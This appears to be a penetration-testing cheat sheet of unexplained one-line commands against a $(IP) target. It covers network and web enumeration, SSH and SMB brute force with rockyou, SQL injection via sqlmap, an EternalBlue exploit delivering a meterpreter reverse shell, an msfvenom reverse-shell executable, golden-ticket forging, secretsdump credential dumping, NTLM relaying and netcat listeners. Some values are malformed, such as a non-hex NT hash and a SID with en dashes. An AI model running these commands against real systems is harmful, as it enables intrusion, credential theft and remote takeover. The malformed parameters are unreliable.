sudo nmap -T4 -Pn -sS --top-ports 20 -oA nmap_$(IP) $(IP)/24
impacket-ticketer -nthash 0f5assasa6f -domain-sid S-1–5–21–2986980474–46765180–2505414123 -domain 'domain.local' Administrator
onesixtyone $(IP) -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt
gobuster dir -u http://$(IP)/ -w /usr/share/wordlists/dirb/common.txt -t 50 -o gobuster_dir_$(IP).txt
gobuster dns -d $(IP) -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 50 -o gobuster_dns_$(IP).txt
ffuf -u http://$(IP)/FUZZ -w /usr/share/wordlists/dirb/common.txt -t 50 -o ffuf_$(IP).json
feroxbuster -u http://$(IP)/ -w /usr/share/wordlists/dirb/common.txt -t 50 -o ferox_$(IP).txt
hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/rockyou.txt ssh://$(IP) -t 4
hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/rockyou.txt smb://$(IP) -t 4
medusa -h $(IP) -U /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/rockyou.txt -M ssh
nikto -h http://$(IP) -output nikto_$(IP).txt
whatweb http://$(IP)
httpx -u http://$(IP) -silent -status-code -title -content-length
sqlmap -u "http://$(IP)/vuln.php?id=1" --batch --dbs
wpscan --url http://$(IP) --enumerate u --api-token YOUR_WPSCAN_API_TOKEN
msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS $(IP); set LHOST $(IP); set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LPORT 4444; exploit"
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$(IP) LPORT=4444 -f exe -o shell.exe
impacket-smbclient \\$(IP)\IPC$ -username 'User' -password 'Pass'
impacket-secretsdump -hashes LM:NT 'DOMAIN/Administrator:Password'@$(IP)
impacket-psexec 'Administrator:Password'@$(IP) cmd.exe
impacket-mssqlclient -windows-auth 'DOMAIN\Administrator:Password' -port 1433 $(IP)
sudo impacket-ntlmrelayx -smb2support -t ldap://$(IP)
sudo impacket-smbserver share_name /tmp/share -smb2support
sudo responder -I eth0 -rv
smbclient -L //$(IP) -U 'username%password'
smbmap -H $(IP) -u 'username' -p 'password'
evil-winrm -i $(IP) -u 'Administrator' -p 'Password'
enum4linux -a $(IP)
smbget smb://$(IP)/share/flag.txt -u username -p password
hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt --status --status-timer=10
john --wordlist=/opt/wordlists/rockyou.txt --rules=rockyou-30000 hash.txt
hashid '5f4dcc3b5aa765d61d8327deb882cf99'
hydra-wizard
nc -nvv $(IP) 4444
nc -lvnp 4444
nping --tcp -p 80 $(IP)
sudo tcpdump -i eth0 host $(IP) -w capture_$(IP).pcap
mitmproxy -p 8080
mitmdump -w mitm_$(IP).pcap
searchsploit ms17_010
gowitness single http://$(IP) --timeout 10
ping $(IP)
snmpwalk -v2c -c openview $(IP)
